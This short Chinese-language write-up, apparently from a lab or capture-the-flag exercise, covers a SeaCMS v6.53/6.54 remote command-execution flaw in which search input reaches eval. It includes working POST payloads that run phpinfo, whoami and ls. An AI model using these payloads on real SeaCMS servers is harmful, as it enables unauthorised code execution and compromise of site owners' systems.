seacms-v6.53 命令执行漏洞

seacms-v6.53 命令执行漏洞

 

原文链接：https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

 侵删

1. 漏洞描述

echoSearchPage 函数中的 content 变量传给了 parself 函数，跟踪代码，找到 ./include/main.class.php，可以看到 parseIf 函数会将 content 内容 eval 执行，造成命令执行。

 

二、影响版本

seacms v6.53、seacmsv6.54 版本

 

三、复现过程

1.抓取搜索框数据包将原本内容换为网上 Poc 的内容

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

 

 

2.将数据包放过 查看返回结果 可见写入 9[] 的代码被执行

 

3.进一步利用，可以执行系统命令

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("whoami");

 

 

4.获取 Flag

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("ls /tmp");